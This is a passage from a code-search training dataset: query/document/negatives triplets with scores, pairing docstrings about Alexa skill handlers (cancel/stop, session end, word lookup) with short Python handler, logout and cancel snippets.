[ "0.78951234", "0.7641993", "0.7596383", "0.75123024", "0.7342911", "0.7307534", "0.72152776", "0.71921116", "0.7188953", "0.7140122", "0.7140122", "0.7116266", "0.7116266", "0.7107287", "0.7099637", "0.7098016", "0.7098016", "0.7098016", "0.7098016", "0.7089918", "0.7089918", "0.7089918", "0.7089918", "0.7089555", "0.7086876", "0.7086876", "0.70506287", "0.7045832", "0.7045832", "0.7002749", "0.6982839", "0.6981912", "0.696496", "0.69461197", "0.69436723", "0.694223", "0.69336915", "0.692338", "0.6922821", "0.685666", "0.68547314", "0.68455756", "0.68448085", "0.68332803", "0.68288344", "0.68054205", "0.67878497", "0.67872745", "0.6780394", "0.67791975", "0.6773832", "0.677118", "0.6747107", "0.67469096", "0.67440856", "0.67213476", "0.67074895", "0.6696518", "0.6695141", "0.66768485", "0.66632295", "0.666079", "0.66525114", "0.66334486", "0.6618066", "0.66069704", "0.66068274", "0.6587464", "0.65868706", "0.65807617", "0.65704757", "0.65703285", "0.65680873", "0.65302235", "0.65259355", "0.65206987", "0.6520112", "0.65176827", "0.65053004", "0.6503882", "0.64787453", "0.64589167", "0.64578867", "0.64565754", "0.6452299", "0.6438602", "0.6425202", "0.642381", "0.64227927", "0.6419983", "0.6399455", "0.63948274", "0.6391821", "0.6366804", "0.63637364", "0.63548815", "0.63460416", "0.63449717" ]
0.72494954
8
Single handler for Cancel and Stop Intent.
def cancel_and_stop_intent_handler(handler_input):
    # type: (HandlerInput) -> Response
    speech_text = "Goodbye!"
    return handler_input.response_builder.speak(speech_text).response
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def cancel_and_stop_intent_handler(handler_input):\n return cancel_and_stop_request(handler_input, QUIT_MINUS_POINTS)", "def cancel_and_stop_intent_handler(handler_input):\n # type: (HandlerInput) -> Response\n speech_text = \"Stopping.\"\n\n return handler_input.response_builder.speak(speech_text).set_card(\n SimpleCard(\"Transit Time\", speech_text)).response", "def cancel(self):\n self.stop()\n self.make_callback('canceled')", "def on_cancel(self) -> None:\n pass", "def on_cancel(self) -> None:\n pass", "def OnCancel(self, event):\n pass", "def OnCancel(self, event):\n pass", "def cancel_callback(self):\n pass", "def cancel(self):\n self.on_cancel()", "def handleCancel(self):\n self.isTerminated = True\n self.terminate()", "def cancel_and_stop_intent_handler(handler_input):\n # type: (HandlerInput) -> Response\n speech_text = \"Thanks for playing!!\"\n\n handler_input.response_builder.speak(\n speech_text).set_should_end_session(True)\n return handler_input.response_builder.response", "async def on_cancel(self, payload):\n\n await self._delete_message(0)\n self.stop()", "def cancel(self):", "def cancel(self):", "def cancel(self):", "async def cancel(self, ctx):\n\n return", "def onCancel(self, fetcher): #$NON-NLS-1$\r", "def cancel():", "async def cancel_handler(message: types.Message, state, raw_state=None):\n # Cancel state and inform user about it\n await state.finish()\n # And remove keyboard (just in case)\n await reply(message, \"Canceled.\", reply_markup=types.ReplyKeyboardRemove())", "def _onCancel(self):\n\n self.close()", "def on_cancel(self, goal_handle):\n\t\trospy.loginfo(\"[BRIDGE] Received cancel request.\")\n\t\tgoal_id = goal_handle.get_goal_id()", "def cancel_callback(self, goal_handle):\n self.get_logger().info('Received cancel request')\n return CancelResponse.ACCEPT", "def on_cancel(self, *args):\n self.response(Gtk.ResponseType.CANCEL)", "async def cancel(self):\n\n await self.cb_0.cancel()\n await self.cb_1.cancel()", "def cancel(self):\n pass", "def on_cancel(self):\n self.state = CANCELED\n self._reject()", "def onstop(self, sender, **kwargs):\n pass", "def cancel_stop(cls):\n cls._set_mode_running()", "def on_cancel(self):\n self.quit()", "def on_cancel(self):\n self.quit()", "def on_cancel(self):\n self.quit()", "def on_cancel(self):\n self.quit()", "def do_cancel(self):\r\n self.write({'cancelled': True})", "def on_cancel(self, _):\n self.destroy()", "def on_cancel_pressed(self, oncancel_pressed_callback, app=None):\n if app is not None:\n self._app = app\n self._oncancel_pressed_callback = oncancel_pressed_callback", "def __onCancel(self, ev):\n\n self.__value = None\n self.__cancelled = True\n\n if self.IsModal():\n self.EndModal(wx.ID_CANCEL)\n else:\n self.SetReturnCode(wx.ID_CANCEL)\n self.Close()", "def cancel(self): #$NON-NLS-1$\r", "def _stop(self):", "def cancel(self):\n self.__canceled = True", "def cancel(self):\n self.cancelled = True", "def cancel(self):\n self.cancelled = True", "def cancel(self):\n return self.RES_OK", "def _cancel(self, __button):\r\n\r\n self.assistant.destroy()", "def _cancel(self, __button):\r\n\r\n self.assistant.destroy()", "def cancel(self):\n self.cancelled.set()", "def _chain_cancel(_):\n if recvd.done():\n return\n if f.cancelled():\n recvd.cancel()", "def onBtnCancelClicked(self):\n self.close()", "def on_stop(self):\n print(\"策略停止\")\n\n self.put_event()", "def stop(self, signal):\n pass", "def stop(self, signal):\n pass", "def action_cancel(self):\n ids = isinstance(self.ids, (int)) and [self.ids] or self.ids\n 
context = self._context or {}\n self.cancel_move()\n self.clear_wh_lines()\n return True", "async def async_cancel(self):\n raise NotImplementedError", "def cancel(self):\n\n self.end()\n super().cancel()", "def cancel(self):\n raise NotImplementedError(\n u\"%s: Method not implemented\", self.__class__.__name__)", "def __handle_action_stop(self, file_name: str):\n # value is double encoded\n file_name = unquote(file_name)\n\n command = Controller.Command(Controller.Command.Action.STOP, file_name)\n callback = WebResponseActionCallback()\n command.add_callback(callback)\n self.__controller.queue_command(command)\n callback.wait()\n if callback.success:\n return HTTPResponse(body=\"Stopped file '{}'\".format(file_name))\n else:\n return HTTPResponse(body=callback.error, status=400)", "def cancel_inner():\n kernel32.SetEvent(cancel_event)", "def cancel(self):\n GameLoop.getInstance()._cancelation_token = True", "def force_stop(self):\n #cancel any current request:\n self._cancel_current_request()", "def cancel(self, uid, states=None):\n\n # sets the status if `uid` to canceled.", "def accept_cancel(self):\n self.ok = False\n self.destroy()", "def on_stop(self):\n pass", "def on_stop(self):\n pass", "def on_stop(self):\n pass", "def on_stop(self):\n pass", "def on_stop(self):\n pass", "def on_stop(self):\n pass", "def on_stop(self):\n pass", "def stop_cb(evt): \n speech_recognizer.stop_continuous_recognition()\n nonlocal done\n done = True", "def cancel(self):\n # terminate background thread\n self.stop.set()\n CoordinationAdaptor.delete_cds(self.url)", "def _cancel(self, __button):\r\n\r\n self.assistant.destroy()\r\n\r\n return True", "def _cancel(self, __button):\r\n\r\n self.assistant.destroy()\r\n\r\n return True", "def on_stop(self):\n self.write_log(\"策略停止\")\n self.cta_engine.event_engine.unregister(EVENT_TIMER, self.process_timer_event)", "def iscanceled(*args):", "def cancel(self) -> asyncio.Future:\n pass # pragma: no cover", "def reqGlobalCancel(self):\r\n self.ib.reqGlobalCancel()\r\n logging.info('reqGlobalCancel')", "def action_cancel(self):\n self.state = 'canceled'", "def mark_cancelled(self):\n self.status = STATUS_CANCELED", "def stop_cb(evt):\n # print('CLOSING on {}'.format(evt))\n speech_recognizer.stop_continuous_recognition()\n global done\n done = True", "def stopTask(self, c, card):\r\n \r\n if card == 'A':\r\n if getattr(self, 'taskHandleA', None) is not None:\r\n self._check( \r\n self.nidaq.DAQmxStopTask(self.taskHandleA) \r\n )\r\n \r\n \r\n elif card == 'B': \r\n if getattr(self, 'taskHandleB', None) is not None:\r\n self._check( \r\n self.nidaq.DAQmxStopTask(self.taskHandleB) \r\n )\r\n \r\n \r\n elif card == 'C':\r\n if getattr(self, 'taskHandleC', None) is not None:\r\n self._check( \r\n self.nidaq.DAQmxStopTask(self.taskHandleC) \r\n )", "def stop(self):\n self.on_stop()", "def on_stop(self):\n self.write_log(\"策略停止\")\n\n self.put_event()", "def cancel_operation(self):\n # <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>\n self.proceed = False\n self.entry_view.destroy()", "def pressCancel(self):\n self.close()", "def on_stop(self):\n self.write_log(\"策略停止\")\n self.put_event()", "def request_stop(self):\n self._messaged.emit((\"stop\",None,0,None))", "def cancel(self, membership, callback=None):", "def stop(update, context) -> None:\n update.message.reply_text('Okay, bye.')\n\n logger.info(\"User [%s] canceled conversation using command [/stop].\",\n update.message.from_user.first_name)\n return END", "def Stop(self, *_):\n 
self.Log('Stopping...')\n self._stop = True", "def _cancel(self, __button):\r\n\r\n self.destroy()", "def stop(self) -> None:\n ...", "def canCancel(self) -> bool:\n ...", "def canCancel(self) -> bool:\n ...", "def canCancel(self) -> bool:\n ...", "def canCancel(self) -> bool:\n ...", "def _cancel(self, __button=None):\r\n\r\n self.destroy()", "def cancel(update: Update, context: CallbackContext) -> int:\n update.message.reply_text(\n 'Bye! I hope we can talk again some day.', reply_markup=ReplyKeyboardRemove()\n )\n\n logger.info(\"User [%s] canceled BBT conversation using command [/stop].\",\n update.message.from_user.first_name)\n return ConversationHandler.END", "def Stop(self, request, context):\r\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\r\n context.set_details('Method not implemented!')\r\n raise NotImplementedError('Method not implemented!')", "def stop(self):" ]
[ "0.69462967", "0.67611676", "0.66303724", "0.6449503", "0.6449503", "0.64251965", "0.64251965", "0.6423484", "0.62693846", "0.61464477", "0.6137985", "0.6082715", "0.6080662", "0.6080662", "0.6080662", "0.60464203", "0.60244685", "0.6008756", "0.59916556", "0.5986091", "0.5949461", "0.5948651", "0.59436417", "0.5925479", "0.58696693", "0.58499515", "0.5841929", "0.5780492", "0.5772432", "0.5772432", "0.5772432", "0.5772432", "0.5692817", "0.56836265", "0.56836146", "0.5641666", "0.5621539", "0.5611371", "0.55990183", "0.5587436", "0.5587436", "0.5583813", "0.5576472", "0.5576472", "0.5512149", "0.5501427", "0.54970723", "0.54952973", "0.54902303", "0.54902303", "0.54840016", "0.54779404", "0.54746586", "0.5473962", "0.54638153", "0.5445526", "0.5436865", "0.54321885", "0.5418493", "0.54050106", "0.53914404", "0.53914404", "0.53914404", "0.53914404", "0.53914404", "0.53914404", "0.53914404", "0.53908324", "0.53874326", "0.53746706", "0.53746706", "0.5358957", "0.5357104", "0.53366774", "0.5334347", "0.53279394", "0.5324248", "0.5317712", "0.53137743", "0.5306864", "0.53015476", "0.5293719", "0.52918196", "0.52837497", "0.5283573", "0.5281176", "0.52736485", "0.52720284", "0.5260218", "0.5256821", "0.5250117", "0.5250117", "0.5250117", "0.5250117", "0.52420324", "0.5232636", "0.52264476", "0.5219888" ]
0.63202274
10
Handler for Session End.
def session_ended_request_handler(handler_input):
    # type: (HandlerInput) -> Response
    return handler_input.response_builder.response
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "async def end_session(self):\n\t\t...", "def on_session_ended(session_ended_request, session):\n print(\"END SESSION\")\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):", "def on_session_ended():\n #print(\"on_session_ended\")", "def on_session_ended():\n #print(\"on_session_ended\")", "def on_session_finish(context):\n pass", "def EndSession( self ):\r\n\r\n self._socket.write( 'X' ) \r\n # self._connection.write( 'X' ).flush() \r\n\r\n return self.GetServerResponse()", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def 
on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here", "def on_session_ended(session_ended_request, session):\r\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\r\n \", sessionId=\" + session['sessionId'])\r\n # add cleanup logic here\r", "def on_session_ended(session_ended_request, session):\r\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\r\n \", sessionId=\" + session['sessionId'])\r\n # add cleanup logic here\r", "def on_session_ended(session_ended_request, session):\r\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\r\n \", sessionId=\" + session['sessionId'])\r\n # add cleanup logic here\r", "def on_session_ended(session_ended_request, session):\r\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\r\n \", sessionId=\" + session['sessionId'])\r\n # add cleanup logic here\r", "def on_session_ended(session_ended_request, session):\r\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\r\n \", sessionId=\" + session['sessionId'])\r\n # add cleanup logic here\r", "def logout_callback(item):\n yctx.session_end()", "def on_session_closed(self):\n self.session = None", "def endSession(self):\n if(self.verb >= DLS_VERB_HIGH):\n print \"--Ending session with %s (no action)\" % (self.server)", "def on_session_ended(event, session_ended_request, session):\n logger.info(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add 
cleanup logic here?", "def on_session_ended(event_request, session):\n print(\"=====on_session_ended requestId=\" + event_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n return play_end_message()", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] + \", sessionId=\" + session['sessionId'])\n \n # Todo: add cleanup logic here", "def sessionEnded(self):\r\n if self.sessionStarted == True: \r\n self.sessionCompleted = True", "def on_session_ended(session_ended_request, session):\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])", "def on_session_ended(session_ended_request, session):\r\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\r\n \", sessionId=\" + session['sessionId'])", "def handle_session_end_request():\n card_title = \"Session Ended\"\n speech_output = \"Thank you for trying Cuni Control. \" \\\n \"Have a nice day! \"\n \n # Setting this to true ends the session and exits the skill.\n should_end_session = True\n return build_response({}, build_speechlet_response(\n card_title, speech_output, None, should_end_session))", "def on_session_destroyed(session_context):\n if data.AUTO_SHUTDOWN:\n import sys\n\n sys.exit(\n \"\\033[1;31mThe session has ended - tab closed or timeout. \\n\\n --- Terminating the Forest progam and relinquishing control of port. ---\\033[1;00m\"\n )", "def end_session(request):\n\n session_check = _check_session_valid(request)\n\n if session_check:\n return session_check\n\n del request.session[\"analytics\"]\n\n response = {\n \"redirect_url\": \"/main\"\n }\n\n return JsonResponse(response)", "def on_session_closed(self, session):\n if session.id in self.sessions:\n del self.sessions[session.id]", "def session_end(self, user):\n self._transport.delete(\"/service/v3/sessions\", self._subject, username=user)", "def on_timeout(self):\n self.logger.debug('id=%d, Session timed out!', self.id)\n self.close(SessionCloseErrorCode.SESSION_DIED)", "def close_session(self):\n if self.sma_sid is None:\n return\n yield from self._fetch_json(URL_LOGOUT, {})\n self.sma_sid = None", "def _handle_logout(self):\n self.food_service.log_out()\n self._handle_after_logout()", "def handle_session_end_request():\n speech_output = None\n response = response_builders.build_response(session_attributes,\n response_builders.build_speechlet_response(card_title,\n speech_output, reprompt_text, should_end_session))\n return response", "def on_exit(session):\n session.close()", "def session_ended_request_handler(handler_input):\n # type: (HandlerInput) -> Response\n\n speech_text = \"The session ended.\"\n handler_input.response_builder.speak(speech_text)\n\n logger.info(\n \"Session ended with reason: {}\".format(\n handler_input.request_envelope.request.reason))\n return handler_input.response_builder.response", "def close_session(self, message):\n pass", "def process_logout():\n\n print \" LOGGED OUT USER \"\n\n del session[\"user_id\"]\n\n flash(\"You have Successfully Logged Out!\")\n\n return redirect(\"/\")", "def process_logout():\n\n print \" LOGGED OUT USER \"\n\n del session[\"user_id\"]\n\n flash(\"You have Successfully Logged Out!\")\n\n return redirect(\"/\")", "def set_end_session(self, end):\n self.response.shouldEndSession = end", "def default_after_end_session_hook(\n request, id_token=None, post_logout_redirect_uri=None,\n state=None, client=None, next_page=None):\n 
return None", "def session_ended(self, f):\n self._session_ended_view_func = f\n\n return f", "def _handleSessionStopped(self, data):\r\n print(\"\\\"Session stopped\\\" received\")\r\n self.whitebeet.v2gParseSessionStopped(data)\r\n self.charger.stop()", "async def async_close_session(self) -> None:\n if not self.token:\n return\n\n await self._async_ws_set_function(CMD_LOGOUT, {})\n self.token = None", "def terminate_session():\n token = oidc.user_loggedin and oidc.get_access_token()\n if token and oidc.validate_token(token):\n # Direct POST to Keycloak necessary to clear KC domain browser cookie\n logout_uri = oidc.client_secrets['userinfo_uri'].replace(\n 'userinfo', 'logout')\n data = {\n 'client_id': oidc.client_secrets['client_id'],\n 'client_secret': oidc.client_secrets['client_secret'],\n 'refresh_token': oidc.get_refresh_token()}\n requests.post(logout_uri, auth=BearerAuth(token), data=data)\n\n oidc.logout() # clears local cookie only", "def end_session(self):\r\n self.web_driver.quit()\r\n self.write_log(\"Web driver ended.\")", "def logout(self):\n try:\n log.info(\"Logging out of the netscaler\")\n self.post(\"/logout\", {\"logout\": {}})\n except BadNetScaler as error:\n log.error(\"Failed to logout of the netscaler: %s\", error)\n self.sessionid = \"\"", "def on_session_ended(session_ended_request, session):\r\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\r\n \", sessionId=\" + session['sessionId'])\r\n # add cleanup logic here\r\n global current_x\r\n global current_y\r\n global prev_x\r\n global prev_y\r\n current_x = 0\r\n current_y = 0\r\n prev_x = 0\r\n prev_y = 0", "def on_connection_close(self, *args, **kwargs):\n print \"CONNECTION CLOSED!!!!\"\n self.p.terminate()\n tornado.web.RequestHandler.on_connection_close(self, *args, **kwargs)", "def close(self):\n self.session.close(SessionCloseErrorCode.SESSION_DIED)", "def stop_cb(evt: speechsdk.SessionEventArgs):\n print('CLOSING on {}'.format(evt))\n nonlocal done\n done = True", "def close(self):\n\n if self.closed:\n return\n\n url = '{0}://{1}/admin/launch?script=rh&template=logout&action=logout'\n\n try:\n resp = self._handle.open(url.format(self.proto, self.host))\n pg = resp.read()\n if 'You have been successfully logged out.' 
not in pg:\n self.log('Failed logout, somehow:\\n{0}'.format(pg))\n else:\n self._closed = True\n except (urllib2.HTTPError, urllib2.URLError) as e:\n self.log('{0}: {1}'.format(e.__class__.__name__, e))", "def end_session(self, session_id):\n params = {\n 'ident': session_id,\n 'sessionclosed': 1 # Requests a session to be closed\n }\n response = urllib2.urlopen(\n self.endpoint, urllib.urlencode(params)).read()\n\n return response == ''", "def logout(self):\n self.session.disconnect()", "def at_server_shutdown(self):\n for session in self.sessions.all():\n session.sessionhandler.disconnect(session)", "def shutdown_session(response):\n db_session.remove()\n return response", "def shutdown_session(response):\n db_session.remove()\n return response", "def end(self, send_logout_to_apis=False, request=None):\n self.ended_at = now()\n self.save()\n\n if send_logout_to_apis and request:\n from oidc_apis.backchannel_logout import send_backchannel_logout_to_apis_in_token_scope\n\n tokens = [se.content_object for se in self.get_elements_by_model(Token)]\n for token in filter(None, tokens):\n send_backchannel_logout_to_apis_in_token_scope(token, request, sid=str(self.id))", "def on_close(self):\n\n if self.id in self.funcserver.websocks:\n self.funcserver.websocks[self.id] = None\n ioloop = tornado.ioloop.IOLoop.instance()\n ioloop.add_callback(lambda: self.funcserver.websocks.pop(self.id, None))\n\n psession = self.funcserver.pysessions.get(self.pysession_id, None)\n if psession:\n psession[\"socks\"].remove(self.id)\n if not psession[\"socks\"]:\n del self.funcserver.pysessions[self.pysession_id]", "def handle_finish_session_request(intent, session):\n \n print(\"handle_finish_session_request\", intent)\n\n return response(speech_response=\"Danke fürs mitspielen!\", should_end_session=True,\n card_text=ABSCHIED_CARD_TEXT)", "def stop(self):\n return self.rpc.call(MsfRpcMethod.SessionStop, [self.sid])", "def session_shutdown(self, session):\n self.remove_session(session)", "def logout(self):\n url = \"https://%s/game/index.php?page=logout\" % self.server\n #\"https://s103-pt.ogame.gameforge.com/game/index.php?page=logout\"\n self.session.get(url)", "def endMessage(self):", "def rstrtmgr_RmEndSession(jitter):\n ret_ad, args = jitter.func_args_stdcall([\"dwSessionHandle\"])\n raise RuntimeError('API not implemented')\n jitter.func_ret_stdcall(ret_ad, ret_value)", "def handle_close(self):\n self.clear()\n LOGGER.debug(\"local session closed(%d)\", id(self))\n MOLO_CLIENT_APP.remote_session_dict.pop(id(self), None)\n remote_session = MOLO_CLIENT_APP.remote_session_dict.get(id(self))\n if remote_session:\n remote_session.handle_close()\n self.close()", "def logout(self):\n spotify.Error.maybe_raise(lib.sp_session_logout(self._sp_session))", "def user_logged_out(self, sender, request, user, **kwargs):", "def sendSslEnd(self, req):\n self._sendTcpMessage(self.SONY_MSG_Tcp_ProxyEnd, req, self.ThreeValueMsg.pack(a=1, b=1, c=0))", "def end_request(self, environ):\n pass", "def close(self):\n self.sess.close()\n print(\"Current session closed!\")", "def handle_close(self):\n LOGGER.debug(\"server closed(%d)\", id(self))\n self.clear()\n MOLO_CLIENT_APP.local_session_dict.pop(id(self), None)\n local_session = MOLO_CLIENT_APP.local_session_dict.get(id(self))\n if local_session:\n local_session.handle_close()\n self.close()", "def logout(self):\n pass", "def __end_session(session):\n\n # reset agent and game recording info\n session['recording'] = False\n # gather time information and compile stats\n 
session['endTime'] = time.time()\n\n output_logs(session)\n\n stats = compile_stats(session)\n\n return stats", "def logout(self):\n data = {'action': 'logout'}\n self.call(data)\n self._high_limits = None\n return True", "def test_dispatch_session_end(self):\n @self.skill.session_ended\n def sample_func():\n \"\"\"Decorated function.\"\"\"\n self.skill.response.sessionAttributes['run'] = True\n self.skill.request.request.type = 'SessionEndedRequest'\n self.skill.dispatch()\n self.assertTrue(self.skill.response.sessionAttributes['run'])", "def logout(session):\r\n response = session.get(LOGOUT_URL)\r\n response.raise_for_status()", "def close(self, code=3000, message='Go away!'):\n if self.state != CLOSED:\n try:\n self.conn.on_close()\n except:\n LOG.debug(\"Failed to call on_close().\", exc_info=True)\n finally:\n self.state = CLOSED\n self.close_reason = (code, message)\n self.conn = None\n\n # Bump stats\n self.stats.on_sess_closed(self.transport_name)\n\n # If we have active handler, notify that session was closed\n if self.handler is not None:\n self.handler.session_closed()", "def ldap_logout():\n timed_out = request.args.get('timed_out', False)\n logout_user()\n create_auth_event(\n auth_event_type=event_type.USER_FAILED_LOG_IN,\n user_guid=session[\"user_id\"],\n new_value={\n 'success': True,\n 'type': current_app.config['AUTH_TYPE'],\n 'timed_out': timed_out\n }\n )\n session.clear()\n if timed_out:\n flash(\"Your session timed out. Please login again\", category=\"info\")\n return redirect(url_for(\"main.index\"))", "def on_end(self, ctx):\n pass", "def do_logout():\n del session[CURRENT_USER_KEY]" ]
[ "0.7643362", "0.76416", "0.7545587", "0.7457293", "0.7457293", "0.7399156", "0.72849315", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72760904", "0.72389835", "0.72389835", "0.72389835", "0.72389835", "0.72389835", "0.7209444", "0.71777976", "0.7160291", "0.7089481", "0.70823884", "0.70736307", "0.7033392", "0.7005722", "0.6969514", "0.69112545", "0.6908785", "0.6762447", "0.67195565", "0.6715968", "0.6626428", "0.6589876", "0.6552739", "0.65475017", "0.65180784", "0.6497212", "0.64951265", "0.64784056", "0.64784056", "0.6443537", "0.64229184", "0.6401545", "0.63840926", "0.6341352", "0.6215513", "0.62070245", "0.6206105", "0.6202281", "0.61723554", "0.61644644", "0.6128591", "0.61243105", "0.6123884", "0.61194223", "0.6118473", "0.61147594", "0.61147594", "0.6112565", "0.60985607", "0.6097556", "0.6097463", "0.60840464", "0.60735977", "0.60726", "0.60507965", "0.6036347", "0.603521", "0.60018873", "0.5995472", "0.59916806", "0.59837323", "0.59507865", "0.59489524", "0.59414923", "0.5938073", "0.5934755", "0.5920715", "0.59019816", "0.5896067", "0.5892325", "0.5886072" ]
0.0
-1
Check if word is provided in slot values. Send word to URLbuilder and return JSON data. Give user definition information.
def my_word_definition_handler(handler_input): # type: (HandlerInput) -> Response slots = handler_input.request_envelope.request.intent.slots if word_slot in slots: curr_word = slots[word_slot].value handler_input.attributes_manager.session_attributes[ word_slot_key] = curr_word try: response = http_get(curr_word, False) if response: speech = ("The definition of {} with part of speech {} " "is: {}".format(curr_word, response[0]['fl'], response[0]['shortdef'][0])) reprompt = ("What word would you like me to look up?") else: speech = ("I am sorry I could not find the word {}").format(curr_word) reprompt = ("What word would you like me to look up?") except: speech = ("I am sorry I could not find the word {}. " "Can I look up another word?").format(curr_word) reprompt = ("What word would you like me to look up?") else: speech = "I'm not sure what word to look up, please try again" reprompt = ("I didn't catch that. What word would you like me " "me to look up?") handler_input.attributes_manager.session_attributes[previous_key] = speech handler_input.response_builder.speak(speech).ask(reprompt) return handler_input.response_builder.response
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def my_word_example_handler(handler_input):\n # type: (HandlerInput) -> Response\n slots = handler_input.request_envelope.request.intent.slots\n\n if example_slot in slots:\n curr_word = slots[example_slot].value\n handler_input.attributes_manager.session_attributes[\n example_slot_key] = curr_word\n\n try:\n response = http_get(curr_word, False)\n\n if response:\n example = response[0]['def'][0]['sseq'][0][0][1]['dt'][1][0]\n if example == \"vis\":\n vis = remove_italics(response[0]['def'][0]['sseq'][0][0][1]['dt'][1][1][0]['t'])\n speech = (\"An example with {} (part of speech {}) \"\n \"is: {}\".format(curr_word, response[0]['fl'],\n vis))\n elif example == \"wsgram\":\n vis = remove_italics(response[0]['def'][0]['sseq'][0][0][1]['dt'][2][1][0]['t'])\n speech = (\"An example with {} (part of speech {}) \"\n \"is: {}\".format(curr_word, response[0]['fl'],\n vis))\n else:\n speech = (\"No example is available for {}\").format(curr_word)\n reprompt = (\"What word would you like me to look up?\")\n else:\n speech = (\"No example is available for {}\").format(curr_word)\n reprompt = (\"What word would you like me to look up?\")\n except Exception as e:\n speech = (\"No example is available for {}. \"\n \"Can I look up another word?\").format(curr_word)\n reprompt = (\"What word would you like me to look up?\")\n else:\n speech = \"I'm not sure what word to look up, please try again\"\n reprompt = (\"I didn't catch that. What word would you like me \"\n \"me to look up?\")\n\n handler_input.attributes_manager.session_attributes[previous_key] = speech\n handler_input.response_builder.speak(speech).ask(reprompt)\n return handler_input.response_builder.response", "def my_word_example_handler(handler_input):\n # type: (HandlerInput) -> Response\n slots = handler_input.request_envelope.request.intent.slots\n\n if synonym_slot in slots:\n curr_word = slots[synonym_slot].value\n handler_input.attributes_manager.session_attributes[\n synonym_slot_key] = 